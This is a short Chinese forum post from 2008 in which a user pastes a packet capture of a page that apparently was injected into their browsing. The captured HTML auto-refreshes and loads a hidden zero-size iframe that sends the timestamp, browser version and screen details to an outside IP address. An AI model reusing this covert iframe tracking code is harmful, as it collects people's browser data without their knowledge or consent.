|
发表于 2008-7-26 13:18:19
|
显示全部楼层
现在又是这种情况了:
第一次访问抓包数据:
<html>
<head>
<meta http-equiv=Content-Type content="text/html;charset=gb2312">
<meta http-equiv="pragma" content="no-cache"/>
<meta http-equiv="Cache-Control" content="no-store,no-cache,must-revalidate,post-check=0,pre-check=0,max-age=0"/>
<meta http-equiv="expires" content="-1"/>
<meta http-equiv="refresh" content="2"/>
<script language="javascript">
refresh=function(){
location.reload(true);
}
</script>
<script language="javascript">
redir=function()
{
window.frames[0].location = "http://125.89.95.196:6602/index.asp?p=" +
Math.floor((new Date()).getTime()/1000) + "|" +
navigator.appMinorVersion + "|" +
screen.availHeight + "|" +
screen.availWidth + "|" +
screen.colorDepth + "|" +
screen.height + "|" +
screen.width;
}
</script>
</head>
<body onload="window.setInterval('window.status=location.href', 200);redir();var objTimer=window.setTimeout('refresh()',2000)">
<iframe src="about:blank" width="0" height="0" frameborder="0" style="display:none">
</iframe>
</body>
</html> |
|